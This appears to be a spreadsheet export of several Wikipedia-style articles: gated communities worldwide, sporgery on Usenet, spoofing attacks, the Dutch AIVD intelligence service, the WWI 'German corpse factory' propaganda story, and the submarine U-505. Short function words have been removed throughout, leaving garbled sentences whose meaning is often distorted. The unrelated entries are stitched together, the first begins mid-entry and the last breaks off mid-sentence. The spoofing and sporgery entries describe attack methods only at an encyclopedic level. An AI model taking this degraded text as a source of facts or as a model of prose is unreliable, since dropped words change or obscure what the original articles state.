pakistanis. largest bahria town, also largest asia communities major cities. defence housing authority also major developer gated communities. others include wapda town, gulberg, islamabad schon properties, emaar properties also maintains several gated communities country targeting primarily upper class people. gated communities pakistan mostly immune problems enforcement lack energy faced majority housing societies. short time, property prices communities greatly increased 2007 20-square-meter house bahria town, lahore cost around four million pakistani rupees ($40,000); similar property 2012 costed nine million rupees, houses priced around 100-300 million rupees. bahria town karachi currently constructing rafi cricket stadium, completed largest stadium country grand jamia mosque, completed largest south asia third-largest world. peru lima, peru several gated communities, especially wealthy districts molina santiago surco. they home many prominent peruvians. philippines philippines large number gated communities known philippine english "subdivisions" "villages". gated communities represent main residency types upper middle class filipinos country, along condominiums. regardless names, communities either form part larger barangay (village), constitute single barangay themselves. gated communities often grouped phase build, project number, homes within communities designated block number street opposed conventional house numbers building names. gated communities divided types: executive subdivisions/villages: along condominiums, residential neighbourhoods wealthiest philippine society. examples include bel-air, greenwoods executive villages, magallanes village, dasmarinas village, ayala alabang village, among many others.subdivisions/villages: gated communities targeted philippine middle classes. these begin name number e.g. "kalayaan village designating third subdivision project land development company "kalayaan" homes project. examples subdivisions include homes, camella homes, among majority wealthier suburban areas. russia aerobus live complex facto first gated community moscow. business center complex outside residential area. ozero cooperative formed around vladimir putin's dacha lake komsomolskoe (finnish: kiimajärvi), priozersky district, leningrad oblast. saudi arabia saudi arabia, many expatriate workers required live company-provided housing. after 2003 attack hambra, jadawel, siyanco vinell militant saudi dissidents, government established tight military security compounds large western populations. many western individuals also reside many gated compounds non-gated villas apartments cities work. saudi aramco provides compound dhahran largest kind within saudi arabia. gated communities also popular many saudis, accounts limited availability open villas communities premium rent paid housing. these compounds found many saudi arabia's cities, including limited abha, dhahran, riyadh, taif. singapore sentosa cove gated residential community singapore, containing bungalows 99-year leasehold term. landed housing purchased non-citizens. despite this, 2021, properties transact lower price comparable areas mainland. south africa south africa increasing number gated communities, wealthy sometimes live close proximity urban poor (yet little contact two). thailand many housing estates thailand take form gated communities, targeted upper middle classes. they managed development company resident committees. gated communities often referred mubans thailand. turkey turkey several gated communities, especially istanbul ankara. called "site" turkish, mostly located around edge city. united arab emirates united arab emirates, gated communities exploded popularity, particularly dubai, 2002 decision allow foreigners freehold properties resulted construction numerous communities built along various themes. examples include lakes, springs, meadows, arabian ranches. united kingdom united kingdom, gated communities relatively rare. 2004 estimated 1,000 communities england (i.e. including scotland, wales northern ireland). they usually small scale: gated street houses, single block flats. they found london, example, docklands (such caledonian wharf, kings queen wharf peninsula) east london (such quarter bow, london). united states most gated communities unincorporated: some, like indiana's briar ridge, even span incorporated municipality. however, numerous incorporated gated cities southern california, namely bradbury, canyon lake, hidden hills, laguna woods, rolling hills. meet legal requirements, city halls municipal facilities public, private corporations parks facilities within gates. 1997, estimated 20,000 gated communities built across country. approximately homes california behind walls. 1997, estimates number people gated communities ranged million 30,000 communities around million, million california alone. reason difficult determine many gated communities united states privately developed. there incorporated gated communities outside california, including lake quivira, kansas, ranch lakes, florida, anderson creek, north carolina, north oaks, minnesota. smoke rise earliest private gated community club plans united states. encompasses unique homes located 2,500 acres (1,000 addition lake kinnelon, upscale gated community kinnelon, jersey, created estate francis kinney, 19th-century industrialist founded kinney brothers tobacco company. located north woods jersey gated lakeside community provides 24-hour security, activities, clubs special events grounded tradition community spirit service. community conceived based dual philosophy homes would look alike minimum size 2,500 square feet located half acre wooded lot.hot springs village, arkansas, largest gated community united states 26,000 heavily wooded acres. springs village governed springs village property owners' association, private, tax-exempt home owners association. harbor, michigan, largest gated community midwestern united states. village rosemont, illinois, outside chicago, maintains security checkpoint entrance main residential section. naval square first city philadelphia, pennsylvania. neighbourhood gives suburban feel otherwise urban environment. downtown miami, florida, neighbourhood brickell gated island community high-rise residential towers. although anyone walk onto island come public bus, authorized automobiles enter. brickell expensive apartments miami.in 2012, gated community retreat twin lakes made famous killing trayvon martin george zimmerman national spotlight well year 2013 acquittal zimmerman. popular media comics early walking dead comic book series, rick grimes attempts settle gated condominium neighbourhood. this move proves disastrous group members killed survivors realize neighbourhood infested zombies. film john duigan's lawn dogs (1997), starring mischa barton rockwell, films young girl gated community befriends landscape worker, examines societal repercussions friendship. mexican film zona, directed rodrigo plá, talks gated community invaded group young poor children. family movie picture this starring ashley tisdale, drew lives gated community called camelot. spanish movie secuestrados, kidnappers take daughter family living allegedly secure gated community. 2007 animated movie alvin chipmunks, chipmunks guardian dave seville live gated community. 2022 film cheaper dozen, baker family relocated angeles gated community calabasas, california moved larger house accommodate large family. film, baker family move back angeles. games grand theft auto gated community called beachgate, fictional rendition gate, brooklyn. includes home early antagonist mikhail faustin. literature (alphabetical author's last name) margaret atwood's novel oryx crake, characters snowman crake live work corporate-owned gated communities known compounds. j.g. ballard examined phenomenon novella running wild (1988) novel super-cannes (2000). t.c. boyle's novel tortilla curtain (1995) near gated community california. novel parable sower, octavia butler, takes place world much civilization lives within gated communities. novel will fear evil robert heinlein, wealthiest citizens shelter urban poverty inside fortress-like guarded gated communities. levin's novel stepford wives (1972) takes place inside idyllic gated community secretly enslaves female members conform standards men. percy jackson olympians heroes olympus series rick riordan, elysium depicted gated community could hear laughter smell barbecue cooking. besides isle blessed center large lake there, elysium neighbourhoods beautiful houses every time period history roman villas, medieval castles, victorian mansions. also flowers silver gold blooming lawns grass rippling rainbow colors. argentina, claudia piñeiro's viudas jueves (thursday widows) became local bestseller winning 2005 edition clarín newspaper book award. novel depicts life dwellers gated community, among them, families enjoyed high incomes facing economic hardships. egypt, ahmed khaled towfik's novel utopia takes readers chilling journey beyond gated communities north coast wealthy insulated bleakness life outside walls. novel snow crash (1992) neal stephenson, gated communities evolved "burbclaves" (suburban enclaves) effectively sovereign city-states. songs "versace", drake says: "this gated community please fuck property"–referring gated community hidden hills, california. television season episode x-files entitled "arcadia", mulder scully investigate disappearances within gated community seems harboring terrible secret involving tulpa. cartoon told ginger, griplings reside protective pines. spongebob squarepants episode "squidville", squidward tentacles temporarily moves gated community squids away spongebob squarepants patrick star. bravo network reality television series real housewives orange county initially primarily gated community coto caza, california ("coto") followed lavish livestyles "housewives" families resided within coto. housewife, lauri waring, lived ladera ranch townhouse, exception-to-the-rule used foil extravagant lifestyle four housewives, lived "behind coto gates". most starter wife miniseries within gated community main character's friend lives. even becomes friends security guard front gate. pilot episode 2002 revival twilight zone titled "evergreen" deals gated community called evergreen estates sinister dealing nonconformity involves rebellious children committing acts taken "arcadia fertilizer company" executed made fertilizer small trees front houses there. episode veggietales (sherlock holmes golden ruler), larry sings song gated communities silly songs larry. seasons weeds, nancy botwin family inhabit gated community agrestic. neighbors, 2012 series united states, family relocated gated townhouse community called "hidden hills" jersey discover entire community populated residents another planet identify names sport celebrities, patrol community golf carts, receive nourishment eyes mind reading books rather eating, green ears. safe, netflix original series, tells mystery around gated community. short-lived series gates, nick monohan family move chicago quiet, upscale planned community called gates chief police. they soon realize neighbors seem gates filled beings vampires, witches, werewolves, succubus. also age-restricted community barracks castle closed city closed community condominium defensive wall fort homeowners association peace lines planned unit development private community references further reading arizaga, maria cecilia: mito comunidad ciudad mundializada. isbn 987-9035-28-3 [arizaga, maria cecilia: murallas barrios cerrados, morfología espacial ajuste buenos aires. nueva sociedad, 166, 2000 http://www.nuso.org/upload/articulos/2836_1.pdf archived april 2013 wayback machine] blakely, edward mary gail snyder; fortress america: gated communities united states; brookings institution press, edition june 1999); isbn 978-0-8157-1003-5 gasior-niemiec, anna; glasze, georg pütz, robert (2009): glimpse rising walls: reflection post-communist transformation polish discourse gated communities. east european politics societies (2009) 244–265. glasze, georg, chris webster klaus frantz (2006): "introduction: global local perspectives rise private neighbourhoods". georg glasze, chris webster klaus frantz (eds.): private cities: global local perspectives. routledge. london york: 1–8. archived june 2017 wayback machine glasze, georg (2003): private neighbourhoods club economies shareholder democracies. belgeo 1/2003 theme issue "privatization urban spaces contemporary european cities": 87-98 archived june 2017 wayback machine libertun duren, nora. "planning carte: location patterns gated communities around buenos aires decentralized planning context". international journal urban regional research 30.2 (2006): 308–327. low, setha behind gates: life, security pursuit happiness fortress america. routledge: york london: 2003. webster, chris, georg glasze klaus frantz (2002): "the global spread gated communities". environment planning (2002) 315-320 external links built metaphors: gated communities fiction, stéphane degoutin gwenola wagon gated communities urban pathology?, renaud goix privatization urban space: gated communities trend global urban development? land design innovations private communities china's transition turning point forbes: most expensive gated communities america 2004 fortress bulgaria: gated communities zirzow, fran espinoza jonas janssen. 2012. "gated communities". interamerican wiki: terms concepts critical perspectives.</t>
  </si>
  <si>
    <t>Sporgery</t>
  </si>
  <si>
    <t>sporgery disruptive posting flood articles usenet newsgroup, article headers falsified appear posted others. word portmanteau spam forgery, coined german software developer, critic scientology, tilman hausherr.sporgery resembles crapflooding, also intended disrupt forum. however, sporgery merely disruptive also deceptive libellous—it involves falsifying objectionable posts appear come newsgroup regulars. purpose merely forum, also sully reputations regular users falsely signing names offensive posts. origins alt.religion.scientology word sporgery coined newsgroup alt.religion.scientology, internet newsgroup people discuss controversial belief system scientology. various actions "war" scientology internet involved various individuals posted million forged newsgroup articles newsgroup, using message headers (valid names e-mail addresses) articles written scientology critics legitimate posters, appending headers bodies articles harvested racist newsgroups. result flood newsgroup million forged articles made posters appear hateful "racist bigots". (critics accused scientology planning conducting spam flood, organization denied this.)the apparent intent attack render newsgroup useless discussion criticism scientology. another purpose lower reputation posters people would take criticisms scientology seriously.at peak attack, attackers computers posting sporgeries newsgroup, dumping usenet average megabytes 44,075 articles every month. from october 1998 september 1999, 1,462,390,911 sporgery bytes detected: figure include sporgery canceled (deleted usenet) could propagate. just sporgery attack ended, sporgery resulted newsgroup's traffic.to accomplish sporgery attack, spammers used several methods acquire internet access. open nntp servers used available, extent great many closed owners. when open nntp servers eventually became scarce, open proxies used. these proxies allowed scientology partisans someone else's computer hardware sporge. because default security policies many proxy server products time (late 1990s) lax, many proxies available abuse. since time, open proxies become popular resource spammers abuse, eclipsing open relays insecure hosts. third method used acquire newsgroup posting access, method used most, volunteers internet dialup access internet service provider using false name address, using cash money order. they given large amount cash fare city specifically acquire internet access later sporging. volunteer, tory bezazian, later left scientology confessed performing task, giving names scientology staff members allegedly charge sporgery project. sporgery attack alt.religion.scientology ended months name address perpetrators acquired victims, time united states federal bureau investigation involved. indictments made, arrests. other sporgery attacks since emergence technique disrupting newsgroup, groups targeted way. one, news.admin.net-abuse.email, used discussion spamming email abuse problems. person persons using pseudonym "hipcrime" attacked groups sporgeries, usually nonsense dissociated press text posted random names legitimate posters. sporgery also common warez newsgroups. also cleanfeed usenet spam filter spamming technique sends unsolicited e-mails using spoofed sender data newsgroup spam type spam targets usenet newsgroups spamming unsolicited electronic messages, especially advertisements references external links attack against alt.religion.scientology forged article flood (david rice) scientology fought internet—and lost (daily dot)</t>
  </si>
  <si>
    <t>Spoofing attack</t>
  </si>
  <si>
    <t>context information security, especially network security, spoofing attack situation person program successfully identifies another falsifying data, gain illegitimate advantage. internet spoofing tcp/ip many protocols tcp/ip suite provide mechanisms authenticating source destination message, leaving vulnerable spoofing attacks extra precautions taken applications verify identity sending receiving host. spoofing spoofing particular used leverage man-in-the-middle attacks hosts computer network. spoofing attacks take advantage tcp/ip suite protocols mitigated firewalls capable deep packet inspection taking measures verify identity sender recipient message. domain name spoofing term 'domain name spoofing' simply though less accurately, 'domain spoofing') used generically describe class phishing attacks depend falsifying misrepresenting internet domain name. these designed persuade unsuspecting users visiting site intended, opening email reality address shown apparently shown). although website email spoofing attacks widely known, service relies domain name resolution compromised. referrer spoofing some websites, especially pornographic paysites, allow access materials certain approved (login-) pages. this enforced checking referrer header http request. this referrer header, however, changed (known "referrer spoofing" "ref-tar spoofing"), allowing users gain unauthorized access materials. poisoning file-sharing networks "spoofing" also refer copyright holders placing distorted unlistenable versions works file-sharing networks. e-mail address spoofing sender information shown e-mails (the from: field) spoofed easily. this technique commonly used spammers hide origin e-mails leads problems misdirected bounces (i.e. e-mail spam backscatter). e-mail address spoofing done quite writing forged return address using snail mail. long letter fits protocol, (i.e. stamp, postal code) simple mail transfer protocol (smtp) send message. done using mail server telnet. geolocation geolocation spoofing occurs user applies technologies make device appear located somewhere actually located. common geolocation spoofing virtual private network (vpn) proxy order user appear located different country, state territory actually located. according study globalwebindex, global users utilize vpns primarily access territorially restricted entertainment content. this type geolocation spoofing also referred geo-piracy, since user illicitly accessing copyrighted materials geolocation spoofing technology. another example geolocation spoofing occurred online poker player california used geolocation spoofing techniques play online poker jersey, contravention california jersey state law. forensic geolocation evidence proved geolocation spoofing player forfeited $90,000 winnings. telephony caller spoofing public telephone networks often provide caller information, includes caller's number sometimes caller's name, call. however, technologies (especially voice (voip) networks) allow callers forge caller information present false names numbers. gateways networks allow spoofing public networks forward false information. since spoofed calls originate countries, laws receiver's country apply caller. this limits laws' effectiveness spoofed caller information scam. global navigation satellite system spoofing global navigation satellite system (gnss) spoofing attack attempts deceive gnss receiver broadcasting fake gnss signals, structured resemble normal gnss signals, rebroadcasting genuine signals captured elsewhere different time. these spoofed signals modified cause receiver estimate position somewhere actually located different time, determined attacker. common form gnss spoofing attack, commonly termed carry-off attack, begins broadcasting signals synchronized genuine signals observed target receiver. power counterfeit signals gradually increased drawn away genuine signals. suggested capture lockheed rq-170 drone aircraft northeastern iran december, 2011 result attack. gnss spoofing attacks predicted discussed gnss community previously, known example malicious spoofing attack confirmed. "proof-of-concept" attack successfully performed june, 2013, luxury yacht white rose drachs misdirected spoofed signals group aerospace engineering students cockrell school engineering university texas austin. students aboard yacht, allowing spoofing equipment gradually overpower signal strengths actual constellation satellites, altering course yacht. russian spoofing june 2017, approximately twenty ships black complained (us) anomalies, showing vessels transpositioned miles actual location, professor todd humphreys believed likely spoofing attack. anomalies around putin's palace moscow kremlin researchers believe russian authorities spoofing wherever vladimir putin located, affecting maritime traffic. there additional incidents involving russian spoofing including norway spoofing nato exercise lead ship collision (unconfirmed authorities) spoofing syria russian military affected israeli main airport aviv. spoofing since advent software defined radio, simulator applications made available general public. this made spoofing much accessible, meaning performed limited expense modicum technical knowledge. whether technology applies systems remains demonstrated. preventing gnss spoofing there various ways prevent gnss spoofing. some hardware software-based systems already exist. simplified approach improve resiliency gnss equipment spoofing attacks require changes hardware agnostic varying receivers architecture system using anti-spoofing software. anti-spoofing software, similar anti-virus solution, added part system gnss data processed. such seamless anti-spoofing technology able detect false gnss signals warn stop system using fabricated input processing. software-based detection functionality prevent effects spoofing attacks without manually modifying gnss equipment hardware antennas. additionally connected software solution allows regular updates order stay up-to-date, like anti-virus, ever evolving attack methods. department homeland security, collaboration national cybersecurity communications integration center (nccic) national coordinating center communications (ncc), released paper lists methods prevent type spoofing. some important recommended are: obscure antennas. install antennas visible publicly accessible locations obscure exact locations introducing impediments hide antennas. sensor/blocker. sensors detect characteristics interference, jamming, spoofing signals, provide local indication attack anomalous condition, communicate alerts remote monitoring site, collect report data analyzed forensic purposes. extend data spoofing whitelists sensors. existing data spoofing whitelists implemented government reference software, also implemented sensors. gnss signal types. modernized civil signals robust signal leveraged increased resistance interference, jamming, spoofing. reduce latency recognition reporting interference, jamming, spoofing. receiver misled attack attack recognized reported, backup devices corrupted receiver hand-over.these installation operation strategies development opportunities significantly enhance ability receivers associated equipment defend range interference, jamming, spoofing attacks. system receiver agnostic detection software offers applicability cross-industry solution. software implementation performed different places within system, depending gnss data used, example part device's firmware, operating system, application level.a method proposed researchers department electrical computer engineering university maryland, college park school optical electronic information huazhong university science technology aims help mitigate effects gnss spoofing attacks using data vehicles controller area network (can) bus. information would compared received gnss data compared order detect occurrence spoofing attack reconstruct driving path vehicle using collected data. properties vehicles speed steering angle would amalgamated regression modeled order achieve minimum error position 6.25 meters. similarly, method outlined researchers 2016 ieee intelligent vehicles symposium conference paper discuss idea using cooperative adaptive cruise control (cacc) vehicle vehicle (v2v) communications order achieve similar goal. method, communication abilities cars radar measurements used compare supplied gnss position cars determine distance cars compared radar measurements checked make sure match. lengths match within threshold value, spoofing occurred, threshold, user alarmed take action. voice spoofing information technology plays increasingly large role today’s world, different authentication methods used restricting access informational resources, including voice biometrics. examples using speaker recognition systems include internet banking systems, customer identification call call center, well passive identification possible criminal using preset ”blacklist”.technologies related synthesis modeling speech developing quickly, allowing create voice recordings almost indistinguishable real ones. such services called text-to-speech (tts) style transfer services. first aimed creating person. second aimed identifies another voice identification systems. large number scientists busy developing algorithms would able distinguish synthesized voice machine real one. hand, algorithms need thoroughly tested make sure system really works. also domain name spoofing class phishing attacks depend falsifying misrepresenting internet domain name spoofing cyberattack using corrupt data email spoofing creating email spam phishing messages forged sender identity address address spoofing creating packets using false address homograph attack visually similar letters domain names, mixing letters different alphabets trick unsuspecting user trusting clicking link, also known "script spoofing". website spoofing creating website, hoax, intention misleading readers land attack local area network denial service attack using spoofed network packets spoofing changing factory-assigned address phishing attempt trick person revealing information (most often telephone email). stream cipher attacks methods break stream cipher standard facilities might subverted protocol spoofing benign simulation protocol order another, appropriate one). references</t>
  </si>
  <si>
    <t>General Intelligence and Security Service</t>
  </si>
  <si>
    <t>general intelligence security service (dutch: algemene inlichtingen- veiligheidsdienst, aivd; dutch pronunciation: [ˈɑlɣəmeːnə ˈʔɪnlɪxtɪŋə(n) ˈvɛiləxɦɛitsdinst]) intelligence security agency netherlands, tasked domestic, foreign signals intelligence protecting national security. history history dutch intelligence trace back 1914 creation generale staf iii) outbreak world year following war, replaced centrale inlichtingendienst (ci) 1919. after nazi germany invaded netherlands, dutch government-in-exile deemed inadequate efforts created bureau inlichtingen (bi) 1942. after war, 1945, netherlands replaced bureau national security (bureau voor nationale veiligheid) 1947, later known domestic security service (binnenlandse veiligheidsdienst) (bvd) would predecessor aivd. gathering intelligence abroad, foreign intelligence service buitenlandse inlichtingendienst (bid), renamed inlichtingendienst buitenland (idb) 1972 existed since 1946. this service located villa maarheeze wassenaar, north hague. dissolved 1994 heavy internal turmoil. foreign intelligence task eventually handed bvd, turned combined intelligence security service. reason, rebranded algemene inlichtingen veiligheidsdienst (aivd) 2002. mission aivd focuses mostly domestic non-military threats dutch national security, whereas military intelligence security service (mivd) focuses international threats, specifically military government-sponsored threats espionage. aivd charged collecting intelligence assisting combating domestic foreign threats national security. list directors-general oversight accountability minister interior kingdom relations politically responsible aivd's actions. oversight provided three bodies: review board special powers intelligence security services (dutch: toetsingscommissie inzet bevoegdheden, tib) appointed second chamber states general. oversight committee (dutch: commissie toezicht inlichtingen- veiligheidsdiensten, ctivd) also appointed second chamber states general. committee intelligence security services (dutch: commissie voor inlichtingen- veiligheidsdiensten, civd), comprising leaders political parties represented second chamber states general, although 2009 socialist party (sp) want part committee.the aivd publishes annual report includes budget. published version contains redactions information deemed sensitive. aivd forced courts publish records held private citizen, keep secret information relevant current cases. information less five years provided circumstance private citizens records. activities main activities include: monitoring specific people groups people, political extremists religious extremists sourcing intelligence foreign domestic intelligence services performing background checks individuals employed "positions trust," specifically public office higher-up privileged positions industry (such telecommunications, banks, largest companies) includes members parliamentary oversight committees investigating incidents terrorist bombings threats giving advice warning risks national security, including advising protection national leadership netherlands national communications security agency, advising communication security government users methods authorities methods authorities include: telephone internet taps authorized minister internal affairs opposed court order) infiltration (rarely employees service, rather outsiders would easy access particular group) informants (existing members groups recruited) open sources intelligence unfettered access police intelligence foreign intelligence service liaisons reside netherlands diplomatic status (including full diplomatic immunity) collect intelligence excess aivd's authoritythe latter technically sourcing intelligence foreign intelligence service; method confirmed. aivd operates tight concert regional intelligence service (regionale inlichtingen dienst, rid), members police appointed every police district. also co-operates hundred intelligence services. criticism service criticized for: soon arrest dutch businessman frans anraat, convicted complicity crimes selling materials production chemical weapons iraq reign saddam hussein, dutch newspapers reported anraat informer dutch secret service aivd enjoyed aivd's protection. letting abdul qadeer khan, stole dutch nuclear knowledge used pakistan produce nuclear bomb. however, former prime minister netherlands ruud lubbers claimed 2005 done foreign request. enough focus intelligence islamist groups, particularly following september 2001, attacks murder theo gogh mohammed bouyeri, member hofstad network islamist terrorism enough focus intelligence political violence environmental groups, particularly following murder fortuyn environmental radical delivering hand grenades members hofstadgroep alleged informer saleh bouali investigating family members queen family rift (princess margarita edwin zuydewijn), though ordered minister internal affairs, rather queen's office losing laptop floppy disk classified information regional office aivd. disk found employee rental agency, subsequently given dutch crime-journalist peter vries. information disks indicated service collected information dutch politician fortuyn members party, well left-wing activists. among things, documents accuse fortuyn underage moroccan boys.during cold reputation interviewing potential employers persons deemed suspicious reason, thereby worrying corporations employment persons. reasons suspect included leftist ideals, membership communist party, spotty military record (such conscientious objector regard conscription), although evidence latter ever produced. cozy bear january 2018 dutch newspaper volkskrant program nieuwsuur reported 2014 general intelligence security service (aivd) successfully infiltrated computers cozy bear observed hacking head office democratic national committee subsequently white house first alert national security agency (nsa) cyber-intrusion. popular culture lair cozy bear translation dutch novel cozy bear relates story infiltration cozy bear told perspective american liaison officer attached aivd. references external links media related algemene inlichtingen- veiligheidsdienst wikimedia commons official website</t>
  </si>
  <si>
    <t>German Corpse Factory</t>
  </si>
  <si>
    <t>german corpse factory kadaververwertungsanstalt (literally "carcass-utilization factory"), also sometimes called "german corpse-rendering works" "tallow factory" notorious anti-german atrocity propaganda stories circulated world according story, kadaververwertungsanstalt special installation supposedly operated germans which, fats scarce germany british naval blockade, german battlefield corpses rendered fat, used manufacture nitroglycerine, candles, lubricants, even boot dubbin. supposedly operated behind front lines davg deutsche abfall-verwertungs gesellschaft ("german waste utilization company"). historian piers brendon called "the appalling atrocity story" world journalist phillip knightley called "the popular atrocity story war." after john charteris, british former chief army intelligence, allegedly stated speech invented story propaganda purposes, principal getting chinese join germany. this widely believed 1930s, used nazis part anti-british propaganda.recent scholars credit claim charteris created story. propaganda historian randal marlin says "the real source story found pages northcliffe press", referring newspapers owned lord northcliffe. adrian gregory presumes story originated rumours circulating years, "invented" individual: "the corpse-rendering factory invention diabolical propagandist; popular folktale, ‘urban myth’, circulated months received official notice." history rumours cartoons rumours germans used bodies soldiers create appear circulating 1915. cynthia asquith noted diary june 1915: discussed rumour germans utilise even corpses converting glycerine by-product soap.” such stories also appeared american press 1915 1916. french press also took gaulois, february, 1916. 1916 book cartoons louis raemaekers published. depicted bodies german soldiers loaded onto cart neatly packaged batches. this accompanied comment written horace vachell: told eminent chemist pounds glycerine extracted corpse fairly well nourished hun... these unfortunates, alive, driven ruthlessly inevitable slaughter. they sent ruthlessly blast furnaces. million dead resolved million pounds glycerine." later cartoon bruce bairnsfather also referred rumour, depicting german munitions worker looking glycerine saying "alas! poor brother!" (parodying well-known advertisement bovril).by 1917 british allies hoping bring china germany. february 1917 english-language north-china daily news published story chinese president feng guozhang horrified admiral paul hintze's attempts impress "admiral triumphantly stated extracting glycerine dead soldiers!". story picked papers.in cases story told rumour, something heard people supposed know'. presented documented fact. corpse factory first english language account real locatable kadaververwertungsanstalt appeared april 1917 issue times london. short piece foot "through german eyes" review german press, quoted recent issue german newspaper berliner lokal-anzeiger brief story reporter karl rosner words length, described smell coming "kadaver" rendering factory, making reference corpses human. following day, april 1917, story repeated prominently editions times daily mail (both owned lord northcliffe time), times running title germans dead, context 500-plus word story editorial introduction stated came april edition belgian newspaper l'indépendance belge published england, turn received belgique, another belgian newspaper published leyden, netherlands. belgian account stated specifically bodies soldiers interpreted word "kadaver" reference human corpses.the story described corpses arrived rail factory, placed "deep forest country" surrounded electrified fence, rendered fats processed stearin form tallow). went claim used make soap, refined yellowish brown colour". supposedly incriminating passage original german article translated following words: pass evergnicourt. there dull smell air, lime burnt. passing great corpse utilization establishment (kadaververwertungsanstalt) army group. turned lubricating oils, everything else ground bones mill powder, used mixing pigs' food manure. debate followed pages times papers. times stated received number letters "questioning translation german word kadaver, suggesting used human bodies. this, best authorities agreed also used bodies animals." letters also received confirming story belgian dutch sources later romania. york times reported april article credited french newspapers exception paris-midi, preferred believe corpses question animals rather humans. york times credit story, pointing appeared early april german newspapers traditionally indulged april fools' pranks, also expression "kadaver" employed current german usage mean human corpse, word "leichnam" used instead. exception corpses used dissection—cadavers. april weekly british humorous magazine punch printed cartoon entitled "cannon-fodder—and after," showed kaiser german recruit. pointing window factory smoking chimneys sign "kadaververwertungs[anstalt]," kaiser tells young man: "and forget kaiser find you—alive dead."on april story raised house commons, government declined endorse lord robert cecil declared information beyond newspaper reports. added that, view actions german military authorities, nothing incredible present charge them." however, government, said, neither responsibility resources investigate allegations. months followed, account kadaververwertungsanstalt circulated worldwide, never expanded beyond account printed times; eyewitnesses ever appeared, story never enlarged amplified. some individuals within government nonetheless hoped exploit story, charles masterman, director propaganda bureau wellington house, asked prepare short pamphlet. this never published, however. masterman mentor, prime minister david lloyd george, never took story seriously. undated anonymous pamphlet entitled 'corpse-conversion' factory: peep behind german lines published darling son, probably around time 1917. month later, times revived rumour publishing captured german army order made reference kadaver factory. issued vsdok, times interpreted verordnungs-stelle ("instructions department"). frankfurter zeitung, however, insisted stood veterinar-station (veterinary station). foreign office agreed order could referring "the carcasses horses."paul fussell also suggested deliberate british mistranslation phrase kadaver anstalt captured german order available animal remains sent installation reduced tallow. postwar claims charteris' speech october 1925, york times reported speech given brigadier general john charteris national arts club previous evening. charteris conservative glasgow, served chief army intelligence part war. according times, brigadier told audience invented cadaver-factory story turning chinese germans, transposed captions photographs came possession, showing dead soldiers removed train funerals, second showing train bearing horses processed fertiliser. subordinate suggested forging diary german soldier verify accusation, charteris vetoed idea.on return charteris unequivocally denied york times' report statement times, saying repeating speculation already published 1924 book these eventful years: twentieth century making. this referred essay bertrand russell, russell asserted that, fact propaganda value seized upon, always strict regard truth. example, worldwide publicity given statement germans boiled human corpses order extract gelatine useful substances. this story widely used china country's participation desired, hoped would shock well-known chinese reverence dead... story going cynically employees british propaganda department, good knowledge german, perfectly well aware "kadaver" means "carcase," "corpse,"... charteris stated merely repeated russell's speculations, adding extra information proposed fake diary: certain suggestions speculations regards origins kadaver story, already published these eventful years (british encyclopedia press) elsewhere, repeated, are, doubtless unintentionally, nevertheless unfortunately, turned definite statements fact attributed lest still doubt, neither invented kadaver story alter captions photographs, faked material propaganda purposes. allegations incorrect absurd, propaganda g.h.q. france, charge intelligence services. interested general public know true origin kadaver story. g.h.q. france came fictitious diary supporting kadaver story submitted. when diary discovered fictitious, rejected. question raised parliament, laming worthington-evans said story germans factory conversion dead bodies first appeared april 1917, berliner lokal-anzeiger, belgian newspapers l'independance belge belgique. austen chamberlain finally established british government accepted story untrue, reply parliament december 1925 said german chancellor authorised authority german government, never foundation story, accepted denial behalf majesty's government. interwar world claim charteris invented story sway opinion chinese germans given wide circulation arthur ponsonby's highly influential book, falsehood war-time, examined, according subtitle, "assortment lies circulated throughout nations during great war". 1931 book spreading germs hate, pro-nazi writer george sylvester viereck also insisted charteris originated story: explanation vouchsafed general charteris 1926 [sic], dinner national arts club, york city. diplomatic denial later generally accepted. charteris's alleged 1925 comments later gave adolf hitler rhetorical ammunition portray british liars would invent imaginary crimes. widespread belief kadaververwertungsanstalt invented propaganda adverse effect world rumours emerging holocaust. earliest reports september 1942, known "sternbuch cable" stated germans "bestially murdering hundred thousand jews" warsaw "from corpses murdered, soap artificial fertilizers produced". victor cavendish-bentinck, chairman british joint intelligence committee, noted reports rather similar "stories employment human corpses last manufacture grotesque lie." likewise, christian century commented "the parallel story ‘corpse factory’ atrocity tale first world striking overlooked.” german scholar joachim neander notes "there doubt reported commercial corpses murdered jews undermined credibility news coming poland delayed action might rescued many jewish lives." recent scholarship modern scholarship supports view story arose rumours circulating among troops civilians belgium, invention british propaganda machine. moved rumour apparent "fact" report berliner lokal-anzeiger appeared real cadaver-processing factory. ambiguous wording report allowed belgian british newspapers interpret proof rumours human corpses used. phillip knightley says charteris concocted claim invented story order impress audience, realising reporter present. randal marlin says charteris's claim invented story "demonstrably false" number details. however, possible fake diary created never used. nevertheless, diary, charteris claimed still exist museum london”, never found. also possible charteris suggested story would useful propaganda china, created miscaptioned photograph sent chinese, evidence this.adrian gregory highly critical ponsonby's account falsehood war-time, arguing story, like many anti-german atrocity tales, originated ordinary soldiers members public: “the process bottom-up top-down,” false atrocity stories “the public misleading press”, rather sinister press propaganda machine deceiving innocent public. joachim neander says process like "feedback loop" plausible stories picked used propagandists charteris: "charteris office probably part creating 'corpse factory' story. can, however, safely assumed actively involved spreading." furthermore, story would remained little rumour tittle-tattle taken respectable newspapers times 1917.israeli writer shimon rubinstein suggested 1987 possible story corpse factory true, charteris wished discredit order foster harmonious relations post-war germany 1925 treaty locarno. rubinstein posited factories “possible pilot-plants extermination centers nazis built world ii.” neander dismisses suggestion absurd. also soap made human corpses notes</t>
  </si>
  <si>
    <t>German submarine U-505</t>
  </si>
  <si>
    <t>u-505 german type submarine built germany's kriegsmarine world captured u.s. navy june 1944. uniquely unlucky career kriegsmarine, distinction "most heavily damaged u-boat successfully return port" world fourth patrol, submarine commanding officer took life combat conditions tenth patrol, following botched patrols. captured june 1944 united states navy task group 22.3 22.3), u-boats captured allied forces world u-505's crew rescued navy task group. submarine towed bermuda secret crew interned prisoner camp, denied access international cross visits. navy classified capture secret prevented germans discovering 1954, u-505 donated museum science industry chicago, illinois. four german world u-boats survive museum ships, type ixcs still existence u-534. design german type submarines slightly larger original type ixbs. u-505 displacement 1,120 tonnes (1,100 long tons) surface 1,232 tonnes (1,213 long tons) submerged. u-boat total length 76.76 (251 in), pressure hull length 58.75 (192 in), beam 6.76 in), height 9.60 in), draft 4.70 in). submarine powered 40/46 supercharged four-stroke, nine-cylinder diesel engines producing total 4,400 metric horsepower (3,240 4,340 shp) surfaced, siemens-schuckert 345/34 double-acting electric motors producing total 1,000 shaft horsepower (1,010 submerged. shafts 1.92 propellers. boat capable operating depths meters (750 ft).the submarine maximum surface speed 18.3 knots (33.9 km/h; 21.1 mph) maximum submerged speed knots (13.5 km/h; mph). when 